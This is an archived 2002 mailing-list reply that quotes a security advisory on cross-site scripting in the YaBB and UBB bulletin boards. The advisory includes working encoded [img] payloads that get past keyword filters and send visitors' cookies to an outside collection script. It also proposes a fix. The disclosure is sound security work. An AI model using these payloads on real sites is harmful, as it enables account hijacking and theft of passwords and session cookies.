Vulnerability Development mailing list archives

Re: [VulnWatch] CSS vulnerabilities in YaBB and UBB allow account hijack [Multiple Vendor]


From: "Raymond Vrolijk" <raymond.vrolijk () veronica nl>
Date: Thu, 17 Jan 2002 12:25:36 +0100

Hi,

Now talking about UBB.. I found out that when I add an Insert Header meta tag in UBB's control panel, it is added twice....
How come?

Greetings from Holland,

Raymond Vrolijk
Programmer
http://www.veronica.nl

----- Original Message -----
From: "Obscure" <obscure () eyeonsecurity net>
To: <vulnwatch () vulnwatch org>
Sent: Wednesday, January 09, 2002 6:35 PM
Subject: [VulnWatch] CSS vulnerabilities in YaBB and UBB allow account hijack [Multiple Vendor]


Advisory Title: CSS vulnerabilities in YaBB and UBB allow account hijack [Multiple Vendor]
Release Date: 08/01/2002

Application: YaBB and UBB


Platform: Any system supporting PERL.

Build -
YaBB : 1 Gold - Service Pack 1 - older versions were affected in the same way.
UBB : Ultimate Bulletin Board(TM) 6.2.0 Beta Release 1.0


Severity: Malicious users can steal session cookies, allowing administrative access to the bulletin board.

Author:
Obscure^
[ obscure () eyeonsecurity net ]

Vendor Status:
YaBB - Informed on 01 Jan 2002, should fix some time in the future ...
UBB - Informed on 08 Jan 2002, should issue a fix on 09 Jan 2002 (seems like they knew about the issue).

Web:

http://yabb.xnull.com
http://www.infopop.com/products/ubb/
http://eyeonsecurity.net/advisories/css_in_yabb_and_ubb.html


Background.

(extracted from http://yabb.xnull.com)

YaBB is a leading provider of FREE, downloadable Perl forums for webmasters, with currently over 50,000 web communities using YaBB worldwide, and over 1 million registered users throughout these forums! Join the messaging revolution; keep visitors coming back....

(extracted from http://www.infopop.com/products/ubb/)

The Ultimate Bulletin Board (UBB)(TM) is the most widely adopted Perl message board on the Web. With a solid five year development history, and worldwide familiarity, it is easy to use and maintain.

Problem.

When a user inserts [IMG]url[/IMG], YaBB changes that text to <img src='url'>.
If someone inserts javascript:alert() instead of the url, the javascript code is executed by Internet Explorer or some other web browsers. This allows stealing of cookie data and other interesting things. YaBB has filtered the javascript method; however, it does not take into consideration that javascript: can be encoded using standard HTML hex and ASCII encoding. Same with UBB.
In UBB I need to encode several strings because they added checking for certain keywords such as cookie.
In my example I change javascript: to javascr&#x69;pt:


Exploit Example.

Inserting a new topic (or reply) with the following text will send visitors' cookies to Eye on Security. The output is saved to http://eyeonsecurity.net/tools/cookies.txt .
Cookies will contain the password in the case of UBB and a session cookie (or encoded password) in YaBB.

-- snap YaBB --

[img]javascr&#x69;pt:document.write
('&#x3cimg

src=&#x68;tt&#x70;://eyeonsecurity.net/tools/cookie.plx?cookie='+escape(docu
ment.cookie)+'&#x3e')
[/img].

-- snap YaBB --

-- snap UBB --

[IMG]javascr&#x69;pt:document.wr&#x69;te
&#x28;'<img%20src=&#x68;tt&#x70;://eyeonsecurity.net/tools/cookie.plx?

cookie='+escape&#x28;document.cook&#x69;e&#x29;+'>'&#x29;
[/IMG]

-- snap UBB --


Fix.

IMG tags should start with http, so that Javascript: and other goodies (play with mailto:) are not allowed.


Note.

Other Bulletin Board Systems may also be vulnerable to these attacks.


Disclaimer.

The information within this document may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any consequences whatsoever
arising out of or in connection with the use or spread of this
information. Any use of this information lays within the user's
responsibility.


Feedback.

Please send suggestions, updates, and comments to:

Eye on Security
mail : obscure () eyeonsecurity net
web : http://www.eyeonsecurity.net
